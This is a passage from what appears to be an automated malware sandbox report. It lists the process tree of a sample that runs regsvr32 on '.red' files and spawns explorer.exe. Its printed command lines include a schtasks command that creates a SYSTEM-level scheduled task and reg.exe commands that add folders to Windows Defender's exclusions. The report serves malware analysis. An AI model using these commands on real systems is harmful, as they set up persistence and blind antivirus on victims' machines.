      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd.red
      Imagebase:0x90000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 2008 Parent PID: 1928

      General

      Start time:16:51:25
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 584 Parent PID: 2528

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd1.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: schtasks.exe PID: 264 Parent PID: 2008

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\schtasks.exe
      Wow64 process (32bit):true
      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn fpdnnxq /tr 'regsvr32.exe -s \'C:\Users\user\Drezd.red\'' /SC ONCE /Z /ST 16:53 /ET 17:05
      Imagebase:0xb60000
      File size:179712 bytes
      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2228 Parent PID: 584

      General

      Start time:16:51:26
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd1.red
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: explorer.exe PID: 2608 Parent PID: 2228

      General

      Start time:16:51:28
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 2816 Parent PID: 1672

      General

      Start time:16:51:29
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high

      Analysis Process: regsvr32.exe PID: 1124 Parent PID: 2816

      General

      Start time:16:51:30
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:moderate

      Analysis Process: regsvr32.exe PID: 2280 Parent PID: 2528

      General

      Start time:16:51:31
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32 -silent ..\Drezd2.red
      Imagebase:0xffb80000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2624 Parent PID: 2280

      General

      Start time:16:51:31
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -silent ..\Drezd2.red
      Imagebase:0xdf0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 2540 Parent PID: 1124

      General

      Start time:16:51:32
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 672 Parent PID: 2540

      General

      Start time:16:51:33
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Djryxcyvgoe' /d '0'
      Imagebase:0xfff70000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: explorer.exe PID: 408 Parent PID: 2624

      General

      Start time:16:51:33
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\explorer.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\explorer.exe
      Imagebase:0xab0000
      File size:2972672 bytes
      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: reg.exe PID: 2064 Parent PID: 2540

      General

      Start time:16:51:35
      Start date:27/09/2021
      Path:C:\Windows\System32\reg.exe
      Wow64 process (32bit):false
      Commandline:C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Benqxuam' /d '0'
      Imagebase:0xffd60000
      File size:74752 bytes
      MD5 hash:9D0B3066FE3D1FD345E86BC7BCCED9E4
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 2624 Parent PID: 1672

      General

      Start time:16:53:00
      Start date:27/09/2021
      Path:C:\Windows\System32\regsvr32.exe
      Wow64 process (32bit):false
      Commandline:regsvr32.exe -s 'C:\Users\user\Drezd.red'
      Imagebase:0xffe60000
      File size:19456 bytes
      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Analysis Process: regsvr32.exe PID: 804 Parent PID: 2624

      General

      Start time:16:53:00
      Start date:27/09/2021
      Path:C:\Windows\SysWOW64\regsvr32.exe
      Wow64 process (32bit):true
      Commandline: -s 'C:\Users\user\Drezd.red'
      Imagebase:0xa0000
      File size:14848 bytes
      MD5 hash:432BE6CF7311062633459EEF6B242FB5
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language

      Disassembly

      Code Analysis

      Reset < >